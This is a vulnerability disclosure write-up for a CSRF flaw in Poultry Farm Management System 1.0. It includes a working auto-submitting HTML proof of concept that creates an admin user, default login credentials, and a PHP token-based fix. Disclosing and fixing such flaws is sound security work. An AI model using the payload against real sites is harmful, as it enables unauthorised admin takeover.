CSRF on Poultry Farm Management System 1.0
Poultry Farm Management System 1.0 is vulnerable to CSRF via /Redcock-Farm/farm/userregister.php. Exploiting this issue allows an attacker to create a user with admin rights by sending a crafted payload to an authenticated user.
Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html
Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip
Tested on: Ubuntu 20.04.5 LTS + PHP 7.4.3, Apache 2.4.41
Identification
Let’s open the code and see the root cause.
newuser_form.php is responsible for creating users.
Since the registration handler has no CSRF protection, we can create a new user whenever an authenticated user opens our payload hosted on our site.
Exploitation
Let's create an HTML form that mirrors the newuser_form form and populate it with the new user's values.
GitHub link: https://gist.github.com/gowthamaraj/afc485841bcf227cdc5c71fc16800ebb
PoC HTML:
<html>
  <form enctype="application/x-www-form-urlencoded" method="POST" action="http://20.163.26.136/Redcock-Farm/farm/userregister.php">
    <table>
      <tr>
        <td>dignity</td>
        <td><input type="text" value="Admin" name="dignity"></td>
      </tr>
      <tr>
        <td>staffid</td>
        <td><input type="text" value="1" name="staffid"></td>
      </tr>
      <tr>
        <td>fullname</td>
        <td><input type="text" value="foxy" name="fullname"></td>
      </tr>
      <tr>
        <td>firstname</td>
        <td><input type="text" value="purple" name="firstname"></td>
      </tr>
      <tr>
        <td>lastname</td>
        <td><input type="text" value="foxy" name="lastname"></td>
      </tr>
      <tr>
        <td>mobileno</td>
        <td><input type="text" value="9000980008" name="mobileno"></td>
      </tr>
      <tr>
        <td>emailid</td>
        <td><input type="text" value="foxy@gmail.com" name="emailid"></td>
      </tr>
      <tr>
        <td>password</td>
        <td><input type="text" value="password" name="password"></td>
      </tr>
      <tr>
        <td>confirmpassword</td>
        <td><input type="text" value="password" name="confirmpassword"></td>
      </tr>
      <tr>
        <td>signup</td>
        <td><input type="text" value="Register" name="signup"></td>
      </tr>
    </table>
    <input type="submit" value="http://20.163.26.136/Redcock-Farm/farm/userregister.php">
  </form>
  <script>
    // Auto-submit the form as soon as the page loads
    document.forms[0].submit();
  </script>
</html>
Change the URLs in the PoC to the target website URL.
I hosted the HTML page at http://20.163.26.136/Redcock-Farm/poc.html for testing. However, you can save the file locally and visit it to test.
Let’s log in to the website using the default credentials provided to us.
Username : ndbhalerao91@gmail.com
Password : admin
Once logged in, visit the poc.html hosted by you.
The user is successfully created.
We can now log in to the website as admin using the user we just created.
Username: foxy@gmail.com
Password: password
Remediation
- Use of CSRF tokens
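As an added example (not the project's own code), a synchronizer-token check for a PHP registration handler like userregister.php; the file name, the helper names and the reduced set of form fields are assumptions for illustration:

```php
<?php
// Added example, not from the Redcock-Farm code base: synchronizer-token CSRF
// protection for a registration handler such as userregister.php.
// Defence in depth: SameSite keeps the session cookie off cross-site POSTs
// (array form of session_set_cookie_params needs PHP 7.3+).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// One random token per session, stored server-side and echoed into the form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; a missing or mismatching token rejects the request.
function csrf_check(?string $submitted): bool {
    return isset($_SESSION['csrf_token'])
        && is_string($submitted)
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // ... existing registration logic goes here (validate input, insert user) ...
    exit('User registered');
}
?>
<!-- The registration form must carry the token as a hidden field;
     an attacker's cross-site page cannot read it and so cannot forge it. -->
<form method="POST" action="userregister.php">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="text" name="emailid">
  <input type="password" name="password">
  <input type="submit" name="signup" value="Register">
</form>
```

With this in place the PoC above fails with a 403 because the forged POST carries no valid csrf_token, and with SameSite=Lax the browser would not even attach the session cookie to it.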